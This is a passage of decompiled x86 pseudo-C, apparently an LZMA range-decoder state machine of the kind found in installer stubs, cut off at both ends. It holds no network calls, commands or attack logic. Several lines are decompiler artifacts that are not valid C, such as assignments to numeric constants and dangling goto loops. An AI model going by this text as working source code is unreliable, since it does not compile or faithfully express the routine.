                                                          												__eax =  *(__ebp - 0x2c);
                                                          												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                          												__eax = 0;
                                                          												__eflags =  *(__ebp - 0x38) - 7;
                                                          												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                          												__al = __al & 0x000000fd;
                                                          												__eax = (__eflags >= 0) - 1 + 0xa;
                                                          												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                          												__eax =  *(__ebp - 4);
                                                          												__eax =  *(__ebp - 4) + 0x664;
                                                          												__eflags = __eax;
                                                          												 *(__ebp - 0x58) = __eax;
                                                          												goto L69;
                                                          											}
                                                          											__eax =  *(__ebp - 4);
                                                          											__ecx =  *(__ebp - 0x38);
                                                          											 *(__ebp - 0x84) = 8;
                                                          											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                          											while(1) {
                                                          												 *(_t613 - 0x54) = _t606;
                                                          												goto L133;
                                                          											}
                                                          										case 8:
                                                          											goto L0;
                                                          										case 9:
                                                          											__eflags =  *(__ebp - 0x40);
                                                          											if( *(__ebp - 0x40) != 0) {
                                                          												goto L89;
                                                          											}
                                                          											__eflags =  *(__ebp - 0x60);
                                                          											if( *(__ebp - 0x60) == 0) {
                                                          												goto L171;
                                                          											}
                                                          											__eax = 0;
                                                          											__eflags =  *(__ebp - 0x38) - 7;
                                                          											_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                          											__eflags = _t258;
                                                          											0 | _t258 = _t258 + _t258 + 9;
                                                          											 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                          											goto L75;
                                                          										case 0xa:
                                                          											__eflags =  *(__ebp - 0x40);
                                                          											if( *(__ebp - 0x40) != 0) {
                                                          												__eax =  *(__ebp - 4);
                                                          												__ecx =  *(__ebp - 0x38);
                                                          												 *(__ebp - 0x84) = 0xb;
                                                          												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                          												while(1) {
                                                          													 *(_t613 - 0x54) = _t606;
                                                          													goto L133;
                                                          												}
                                                          											}
                                                          											__eax =  *(__ebp - 0x28);
                                                          											goto L88;
                                                          										case 0xb:
                                                          											__eflags =  *(__ebp - 0x40);
                                                          											if( *(__ebp - 0x40) != 0) {
                                                          												__ecx =  *(__ebp - 0x24);
                                                          												__eax =  *(__ebp - 0x20);
                                                          												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                          											} else {
                                                          												__eax =  *(__ebp - 0x24);
                                                          											}
                                                          											__ecx =  *(__ebp - 0x28);
                                                          											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                          											L88:
                                                          											__ecx =  *(__ebp - 0x2c);
                                                          											 *(__ebp - 0x2c) = __eax;
                                                          											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                          											L89:
                                                          											__eax =  *(__ebp - 4);
                                                          											 *(__ebp - 0x80) = 0x15;
                                                          											__eax =  *(__ebp - 4) + 0xa68;
                                                          											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                          											goto L69;
                                                          										case 0xc:
                                                          											L99:
                                                          											__eflags =  *(__ebp - 0x6c);
                                                          											if( *(__ebp - 0x6c) == 0) {
                                                          												 *(__ebp - 0x88) = 0xc;
                                                          												goto L170;
                                                          											}
                                                          											__ecx =  *(__ebp - 0x70);
                                                          											__eax =  *(__ebp - 0xc);
                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											_t334 = __ebp - 0x70;
                                                          											 *_t334 =  *(__ebp - 0x70) + 1;
                                                          											__eflags =  *_t334;
                                                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											__eax =  *(__ebp - 0x2c);
                                                          											goto L101;
                                                          										case 0xd:
                                                          											L37:
                                                          											__eflags =  *(__ebp - 0x6c);
                                                          											if( *(__ebp - 0x6c) == 0) {
                                                          												 *(__ebp - 0x88) = 0xd;
                                                          												goto L170;
                                                          											}
                                                          											__ecx =  *(__ebp - 0x70);
                                                          											__eax =  *(__ebp - 0xc);
                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											_t122 = __ebp - 0x70;
                                                          											 *_t122 =  *(__ebp - 0x70) + 1;
                                                          											__eflags =  *_t122;
                                                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											L39:
                                                          											__eax =  *(__ebp - 0x40);
                                                          											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                          											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                          												goto L48;
                                                          											}
                                                          											__eflags = __ebx - 0x100;
                                                          											if(__ebx >= 0x100) {
                                                          												goto L54;
                                                          											}
                                                          											L41:
                                                          											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                          											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                          											__ecx =  *(__ebp - 0x58);
                                                          											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                          											 *(__ebp - 0x48) = __eax;
                                                          											__eax = __eax + 1;
                                                          											__eax = __eax << 8;
                                                          											__eax = __eax + __ebx;
                                                          											__esi =  *(__ebp - 0x58) + __eax * 2;
                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                          											__ax =  *__esi;
                                                          											 *(__ebp - 0x54) = __esi;
                                                          											__edx = __ax & 0x0000ffff;
                                                          											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                          											__eflags =  *(__ebp - 0xc) - __ecx;
                                                          											if( *(__ebp - 0xc) >= __ecx) {
                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                          												__cx = __ax;
                                                          												 *(__ebp - 0x40) = 1;
                                                          												__cx = __ax >> 5;
                                                          												__eflags = __eax;
                                                          												__ebx = __ebx + __ebx + 1;
                                                          												 *__esi = __ax;
                                                          											} else {
                                                          												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                          												 *(__ebp - 0x10) = __ecx;
                                                          												0x800 = 0x800 - __edx;
                                                          												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                          												__ebx = __ebx + __ebx;
                                                          												 *__esi = __cx;
                                                          											}
                                                          											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                          											 *(__ebp - 0x44) = __ebx;
                                                          											if( *(__ebp - 0x10) >= 0x1000000) {
                                                          												goto L39;
                                                          											} else {
                                                          												goto L37;
                                                          											}
                                                          										case 0xe:
                                                          											L46:
                                                          											__eflags =  *(__ebp - 0x6c);
                                                          											if( *(__ebp - 0x6c) == 0) {
                                                          												 *(__ebp - 0x88) = 0xe;
                                                          												goto L170;
                                                          											}
                                                          											__ecx =  *(__ebp - 0x70);
                                                          											__eax =  *(__ebp - 0xc);
                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											_t156 = __ebp - 0x70;
                                                          											 *_t156 =  *(__ebp - 0x70) + 1;
                                                          											__eflags =  *_t156;
                                                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											while(1) {
                                                          												L48:
                                                          												__eflags = __ebx - 0x100;
                                                          												if(__ebx >= 0x100) {
                                                          													break;
                                                          												}
                                                          												__eax =  *(__ebp - 0x58);
                                                          												__edx = __ebx + __ebx;
                                                          												__ecx =  *(__ebp - 0x10);
                                                          												__esi = __edx + __eax;
                                                          												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                          												__ax =  *__esi;
                                                          												 *(__ebp - 0x54) = __esi;
                                                          												__edi = __ax & 0x0000ffff;
                                                          												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                          												__eflags =  *(__ebp - 0xc) - __ecx;
                                                          												if( *(__ebp - 0xc) >= __ecx) {
                                                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                          													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                          													__cx = __ax;
                                                          													_t170 = __edx + 1; // 0x1
                                                          													__ebx = _t170;
                                                          													__cx = __ax >> 5;
                                                          													__eflags = __eax;
                                                          													 *__esi = __ax;
                                                          												} else {
                                                          													 *(__ebp - 0x10) = __ecx;
                                                          													0x800 = 0x800 - __edi;
                                                          													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                          													__ebx = __ebx + __ebx;
                                                          													 *__esi = __cx;
                                                          												}
                                                          												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                          												 *(__ebp - 0x44) = __ebx;
                                                          												if( *(__ebp - 0x10) >= 0x1000000) {
                                                          													continue;
                                                          												} else {
                                                          													goto L46;
                                                          												}
                                                          											}
                                                          											L54:
                                                          											_t173 = __ebp - 0x34;
                                                          											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                          											__eflags =  *_t173;
                                                          											goto L55;
                                                          										case 0xf:
                                                          											L58:
                                                          											__eflags =  *(__ebp - 0x6c);
                                                          											if( *(__ebp - 0x6c) == 0) {
                                                          												 *(__ebp - 0x88) = 0xf;
                                                          												goto L170;
                                                          											}
                                                          											__ecx =  *(__ebp - 0x70);
                                                          											__eax =  *(__ebp - 0xc);
                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											_t203 = __ebp - 0x70;
                                                          											 *_t203 =  *(__ebp - 0x70) + 1;
                                                          											__eflags =  *_t203;
                                                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											L60:
                                                          											__eflags = __ebx - 0x100;
                                                          											if(__ebx >= 0x100) {
                                                          												L55:
                                                          												__al =  *(__ebp - 0x44);
                                                          												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                          												goto L56;
                                                          											}
                                                          											L61:
                                                          											__eax =  *(__ebp - 0x58);
                                                          											__edx = __ebx + __ebx;
                                                          											__ecx =  *(__ebp - 0x10);
                                                          											__esi = __edx + __eax;
                                                          											__ecx =  *(__ebp - 0x10) >> 0xb;
                                                          											__ax =  *__esi;
                                                          											 *(__ebp - 0x54) = __esi;
                                                          											__edi = __ax & 0x0000ffff;
                                                          											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                          											__eflags =  *(__ebp - 0xc) - __ecx;
                                                          											if( *(__ebp - 0xc) >= __ecx) {
                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                          												__cx = __ax;
                                                          												_t217 = __edx + 1; // 0x1
                                                          												__ebx = _t217;
                                                          												__cx = __ax >> 5;
                                                          												__eflags = __eax;
                                                          												 *__esi = __ax;
                                                          											} else {
                                                          												 *(__ebp - 0x10) = __ecx;
                                                          												0x800 = 0x800 - __edi;
                                                          												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                          												__ebx = __ebx + __ebx;
                                                          												 *__esi = __cx;
                                                          											}
                                                          											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                          											 *(__ebp - 0x44) = __ebx;
                                                          											if( *(__ebp - 0x10) >= 0x1000000) {
                                                          												goto L60;
                                                          											} else {
                                                          												goto L58;
                                                          											}
                                                          										case 0x10:
                                                          											L109:
                                                          											__eflags =  *(__ebp - 0x6c);
                                                          											if( *(__ebp - 0x6c) == 0) {
                                                          												 *(__ebp - 0x88) = 0x10;
                                                          												goto L170;
                                                          											}
                                                          											__ecx =  *(__ebp - 0x70);
                                                          											__eax =  *(__ebp - 0xc);
                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											_t365 = __ebp - 0x70;
                                                          											 *_t365 =  *(__ebp - 0x70) + 1;
                                                          											__eflags =  *_t365;
                                                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											goto L111;
                                                          										case 0x11:
                                                          											L69:
                                                          											__esi =  *(__ebp - 0x58);
                                                          											 *(__ebp - 0x84) = 0x12;
                                                          											while(1) {
                                                          												 *(_t613 - 0x54) = _t606;
                                                          												goto L133;
                                                          											}
                                                          										case 0x12:
                                                          											__eflags =  *(__ebp - 0x40);
                                                          											if( *(__ebp - 0x40) != 0) {
                                                          												__eax =  *(__ebp - 0x58);
                                                          												 *(__ebp - 0x84) = 0x13;
                                                          												__esi =  *(__ebp - 0x58) + 2;
                                                          												while(1) {
                                                          													 *(_t613 - 0x54) = _t606;
                                                          													goto L133;
                                                          												}
                                                          											}
                                                          											__eax =  *(__ebp - 0x4c);
                                                          											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                          											__ecx =  *(__ebp - 0x58);
                                                          											__eax =  *(__ebp - 0x4c) << 4;
                                                          											__eflags = __eax;
                                                          											__eax =  *(__ebp - 0x58) + __eax + 4;
                                                          											goto L130;
                                                          										case 0x13:
                                                          											__eflags =  *(__ebp - 0x40);
                                                          											if( *(__ebp - 0x40) != 0) {
                                                          												_t469 = __ebp - 0x58;
                                                          												 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                          												__eflags =  *_t469;
                                                          												 *(__ebp - 0x30) = 0x10;
                                                          												 *(__ebp - 0x40) = 8;
                                                          												L144:
                                                          												 *(__ebp - 0x7c) = 0x14;
                                                          												goto L145;
                                                          											}
                                                          											__eax =  *(__ebp - 0x4c);
                                                          											__ecx =  *(__ebp - 0x58);
                                                          											__eax =  *(__ebp - 0x4c) << 4;
                                                          											 *(__ebp - 0x30) = 8;
                                                          											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                          											L130:
                                                          											 *(__ebp - 0x58) = __eax;
                                                          											 *(__ebp - 0x40) = 3;
                                                          											goto L144;
                                                          										case 0x14:
                                                          											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                          											__eax =  *(__ebp - 0x80);
                                                          											 *(_t613 - 0x88) = _t533;
                                                          											goto L1;
                                                          										case 0x15:
                                                          											__eax = 0;
                                                          											__eflags =  *(__ebp - 0x38) - 7;
                                                          											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                          											__al = __al & 0x000000fd;
                                                          											__eax = (__eflags >= 0) - 1 + 0xb;
                                                          											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                          											goto L120;
                                                          										case 0x16:
                                                          											__eax =  *(__ebp - 0x30);
                                                          											__eflags = __eax - 4;
                                                          											if(__eax >= 4) {
                                                          												_push(3);
                                                          												_pop(__eax);
                                                          											}
                                                          											__ecx =  *(__ebp - 4);
                                                          											 *(__ebp - 0x40) = 6;
                                                          											__eax = __eax << 7;
                                                          											 *(__ebp - 0x7c) = 0x19;
                                                          											 *(__ebp - 0x58) = __eax;
                                                          											goto L145;
                                                          										case 0x17:
                                                          											L145:
                                                          											__eax =  *(__ebp - 0x40);
                                                          											 *(__ebp - 0x50) = 1;
                                                          											 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                          											goto L149;
                                                          										case 0x18:
                                                          											L146:
                                                          											__eflags =  *(__ebp - 0x6c);
                                                          											if( *(__ebp - 0x6c) == 0) {
                                                          												 *(__ebp - 0x88) = 0x18;
                                                          												goto L170;
                                                          											}
                                                          											__ecx =  *(__ebp - 0x70);
                                                          											__eax =  *(__ebp - 0xc);
                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											_t484 = __ebp - 0x70;
                                                          											 *_t484 =  *(__ebp - 0x70) + 1;
                                                          											__eflags =  *_t484;
                                                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											L148:
                                                          											_t487 = __ebp - 0x48;
                                                          											 *_t487 =  *(__ebp - 0x48) - 1;
                                                          											__eflags =  *_t487;
                                                          											L149:
                                                          											__eflags =  *(__ebp - 0x48);
                                                          											if( *(__ebp - 0x48) <= 0) {
                                                          												__ecx =  *(__ebp - 0x40);
                                                          												__ebx =  *(__ebp - 0x50);
                                                          												0 = 1;
                                                          												__eax = 1 << __cl;
                                                          												__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                          												__eax =  *(__ebp - 0x7c);
                                                          												 *(__ebp - 0x44) = __ebx;
                                                          												while(1) {
                                                          													 *(_t613 - 0x88) = _t533;
                                                          													goto L1;
                                                          												}
                                                          											}
                                                          											__eax =  *(__ebp - 0x50);
                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                          											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                          											__eax =  *(__ebp - 0x58);
                                                          											__esi = __edx + __eax;
                                                          											 *(__ebp - 0x54) = __esi;
                                                          											__ax =  *__esi;
                                                          											__edi = __ax & 0x0000ffff;
                                                          											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                          											__eflags =  *(__ebp - 0xc) - __ecx;
                                                          											if( *(__ebp - 0xc) >= __ecx) {
                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                          												__cx = __ax;
                                                          												__cx = __ax >> 5;
                                                          												__eax = __eax - __ecx;
                                                          												__edx = __edx + 1;
                                                          												__eflags = __edx;
                                                          												 *__esi = __ax;
                                                          												 *(__ebp - 0x50) = __edx;
                                                          											} else {
                                                          												 *(__ebp - 0x10) = __ecx;
                                                          												0x800 = 0x800 - __edi;
                                                          												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                          												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                          												 *__esi = __cx;
                                                          											}
                                                          											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                          											if( *(__ebp - 0x10) >= 0x1000000) {
                                                          												goto L148;
                                                          											} else {
                                                          												goto L146;
                                                          											}
                                                          										case 0x19:
                                                          											__eflags = __ebx - 4;
                                                          											if(__ebx < 4) {
                                                          												 *(__ebp - 0x2c) = __ebx;
                                                          												L119:
                                                          												_t393 = __ebp - 0x2c;
                                                          												 *_t393 =  *(__ebp - 0x2c) + 1;
                                                          												__eflags =  *_t393;
                                                          												L120:
                                                          												__eax =  *(__ebp - 0x2c);
                                                          												__eflags = __eax;
                                                          												if(__eax == 0) {
                                                          													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                          													goto L170;
                                                          												}
                                                          												__eflags = __eax -  *(__ebp - 0x60);
                                                          												if(__eax >  *(__ebp - 0x60)) {
                                                          													goto L171;
                                                          												}
                                                          												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                          												__eax =  *(__ebp - 0x30);
                                                          												_t400 = __ebp - 0x60;
                                                          												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                          												__eflags =  *_t400;
                                                          												goto L123;
                                                          											}
                                                          											__ecx = __ebx;
                                                          											__eax = __ebx;
                                                          											__ecx = __ebx >> 1;
                                                          											__eax = __ebx & 0x00000001;
                                                          											__ecx = (__ebx >> 1) - 1;
                                                          											__al = __al | 0x00000002;
                                                          											__eax = (__ebx & 0x00000001) << __cl;
                                                          											__eflags = __ebx - 0xe;
                                                          											 *(__ebp - 0x2c) = __eax;
                                                          											if(__ebx >= 0xe) {
                                                          												__ebx = 0;
                                                          												 *(__ebp - 0x48) = __ecx;
                                                          												L102:
                                                          												__eflags =  *(__ebp - 0x48);
                                                          												if( *(__ebp - 0x48) <= 0) {
                                                          													__eax = __eax + __ebx;
                                                          													 *(__ebp - 0x40) = 4;
                                                          													 *(__ebp - 0x2c) = __eax;
                                                          													__eax =  *(__ebp - 4);
                                                          													__eax =  *(__ebp - 4) + 0x644;
                                                          													__eflags = __eax;
                                                          													L108:
                                                          													__ebx = 0;
                                                          													 *(__ebp - 0x58) = __eax;
                                                          													 *(__ebp - 0x50) = 1;
                                                          													 *(__ebp - 0x44) = 0;
                                                          													 *(__ebp - 0x48) = 0;
                                                          													L112:
                                                          													__eax =  *(__ebp - 0x40);
                                                          													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                          													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                          														_t391 = __ebp - 0x2c;
                                                          														 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                          														__eflags =  *_t391;
                                                          														goto L119;
                                                          													}
                                                          													__eax =  *(__ebp - 0x50);
                                                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                          													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                          													__eax =  *(__ebp - 0x58);
                                                          													__esi = __edi + __eax;
                                                          													 *(__ebp - 0x54) = __esi;
                                                          													__ax =  *__esi;
                                                          													__ecx = __ax & 0x0000ffff;
                                                          													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                          													__eflags =  *(__ebp - 0xc) - __edx;
                                                          													if( *(__ebp - 0xc) >= __edx) {
                                                          														__ecx = 0;
                                                          														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                          														__ecx = 1;
                                                          														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                          														__ebx = 1;
                                                          														__ecx =  *(__ebp - 0x48);
                                                          														__ebx = 1 << __cl;
                                                          														__ecx = 1 << __cl;
                                                          														__ebx =  *(__ebp - 0x44);
                                                          														__ebx =  *(__ebp - 0x44) | __ecx;
                                                          														__cx = __ax;
                                                          														__cx = __ax >> 5;
                                                          														__eax = __eax - __ecx;
                                                          														__edi = __edi + 1;
                                                          														__eflags = __edi;
                                                          														 *(__ebp - 0x44) = __ebx;
                                                          														 *__esi = __ax;
                                                          														 *(__ebp - 0x50) = __edi;
                                                          													} else {
                                                          														 *(__ebp - 0x10) = __edx;
                                                          														0x800 = 0x800 - __ecx;
                                                          														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                          														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                          														 *__esi = __dx;
                                                          													}
                                                          													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                          													if( *(__ebp - 0x10) >= 0x1000000) {
                                                          														L111:
                                                          														_t368 = __ebp - 0x48;
                                                          														 *_t368 =  *(__ebp - 0x48) + 1;
                                                          														__eflags =  *_t368;
                                                          														goto L112;
                                                          													} else {
                                                          														goto L109;
                                                          													}
                                                          												}
                                                          												__ecx =  *(__ebp - 0xc);
                                                          												__ebx = __ebx + __ebx;
                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                          												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                          												 *(__ebp - 0x44) = __ebx;
                                                          												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                          													__ecx =  *(__ebp - 0x10);
                                                          													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                          													__ebx = __ebx | 0x00000001;
                                                          													__eflags = __ebx;
                                                          													 *(__ebp - 0x44) = __ebx;
                                                          												}
                                                          												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                          												if( *(__ebp - 0x10) >= 0x1000000) {
                                                          													L101:
                                                          													_t338 = __ebp - 0x48;
                                                          													 *_t338 =  *(__ebp - 0x48) - 1;
                                                          													__eflags =  *_t338;
                                                          													goto L102;
                                                          												} else {
                                                          													goto L99;
                                                          												}
                                                          											}
                                                          											__edx =  *(__ebp - 4);
                                                          											__eax = __eax - __ebx;
                                                          											 *(__ebp - 0x40) = __ecx;
                                                          											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                          											goto L108;
                                                          										case 0x1a:
                                                          											L56:
                                                          											__eflags =  *(__ebp - 0x64);
                                                          											if( *(__ebp - 0x64) == 0) {
                                                          												 *(__ebp - 0x88) = 0x1a;
                                                          												goto L170;
                                                          											}
                                                          											__ecx =  *(__ebp - 0x68);
                                                          											__al =  *(__ebp - 0x5c);
                                                          											__edx =  *(__ebp - 8);
                                                          											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                          											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                          											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                          											 *( *(__ebp - 0x68)) = __al;
                                                          											__ecx =  *(__ebp - 0x14);
                                                          											 *(__ecx +  *(__ebp - 8)) = __al;
                                                          											__eax = __ecx + 1;
                                                          											__edx = 0;
                                                          											_t192 = __eax %  *(__ebp - 0x74);
                                                          											__eax = __eax /  *(__ebp - 0x74);
                                                          											__edx = _t192;
                                                          											goto L79;
                                                          										case 0x1b:
                                                          											L75:
                                                          											__eflags =  *(__ebp - 0x64);
                                                          											if( *(__ebp - 0x64) == 0) {
                                                          												 *(__ebp - 0x88) = 0x1b;
                                                          												goto L170;
                                                          											}
                                                          											__eax =  *(__ebp - 0x14);
                                                          											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                          											__eflags = __eax -  *(__ebp - 0x74);
                                                          											if(__eax >=  *(__ebp - 0x74)) {
                                                          												__eax = __eax +  *(__ebp - 0x74);
                                                          												__eflags = __eax;
                                                          											}
                                                          											__edx =  *(__ebp - 8);
                                                          											__cl =  *(__eax + __edx);
                                                          											__eax =  *(__ebp - 0x14);
                                                          											 *(__ebp - 0x5c) = __cl;
                                                          											 *(__eax + __edx) = __cl;
                                                          											__eax = __eax + 1;
                                                          											__edx = 0;
                                                          											_t274 = __eax %  *(__ebp - 0x74);
                                                          											__eax = __eax /  *(__ebp - 0x74);
                                                          											__edx = _t274;
                                                          											__eax =  *(__ebp - 0x68);
                                                          											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                          											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                          											_t283 = __ebp - 0x64;
                                                          											 *_t283 =  *(__ebp - 0x64) - 1;
                                                          											__eflags =  *_t283;
                                                          											 *( *(__ebp - 0x68)) = __cl;
                                                          											L79:
                                                          											 *(__ebp - 0x14) = __edx;
                                                          											goto L80;
                                                          										case 0x1c:
                                                          											while(1) {
                                                          												L123:
                                                          												__eflags =  *(__ebp - 0x64);
                                                          												if( *(__ebp - 0x64) == 0) {
                                                          													break;
                                                          												}
                                                          												__eax =  *(__ebp - 0x14);
                                                          												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                          												__eflags = __eax -  *(__ebp - 0x74);
                                                          												if(__eax >=  *(__ebp - 0x74)) {
                                                          													__eax = __eax +  *(__ebp - 0x74);
                                                          													__eflags = __eax;
                                                          												}
                                                          												__edx =  *(__ebp - 8);
                                                          												__cl =  *(__eax + __edx);
                                                          												__eax =  *(__ebp - 0x14);
                                                          												 *(__ebp - 0x5c) = __cl;
                                                          												 *(__eax + __edx) = __cl;
                                                          												__eax = __eax + 1;
                                                          												__edx = 0;
                                                          												_t414 = __eax %  *(__ebp - 0x74);
                                                          												__eax = __eax /  *(__ebp - 0x74);
                                                          												__edx = _t414;
                                                          												__eax =  *(__ebp - 0x68);
                                                          												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                          												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                          												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                          												__eflags =  *(__ebp - 0x30);
                                                          												 *( *(__ebp - 0x68)) = __cl;
                                                          												 *(__ebp - 0x14) = _t414;
                                                          												if( *(__ebp - 0x30) > 0) {
                                                          													continue;
                                                          												} else {
                                                          													L80:
                                                          													 *(__ebp - 0x88) = 2;
                                                          													goto L1;
                                                          												}
                                                          											}
                                                          											 *(__ebp - 0x88) = 0x1c;
                                                          											goto L170;
                                                          									}
                                                          								}
                                                          								L171:
